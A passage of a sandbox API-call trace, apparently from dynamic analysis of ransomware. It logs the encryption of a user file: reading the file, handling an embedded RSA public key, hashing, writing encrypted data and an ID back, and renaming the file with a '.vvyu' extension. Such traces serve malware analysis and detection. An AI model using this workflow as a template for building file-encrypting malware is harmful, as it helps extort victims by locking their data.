hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.639] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.639] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.639] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.640] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.641] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.641] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.641] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.641] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.641] GetLastError () returned 0x0 [0198.641] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.641] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.641] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.641] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.642] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.642] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e28 [0198.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ac8 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.643] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3050 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.646] GetCurrentThreadId () returned 0x66c [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5e30 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.647] GetCurrentThreadId () returned 0x66c [0198.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0198.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ac8 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.657] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.658] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.658] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.659] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.660] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.660] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.660] CloseHandle (hObject=0x568) returned 1 [0198.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0198.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.662] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url.vvyu")) returned 1 [0198.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.663] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.667] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0198.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0198.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.667] PathFindExtensionW 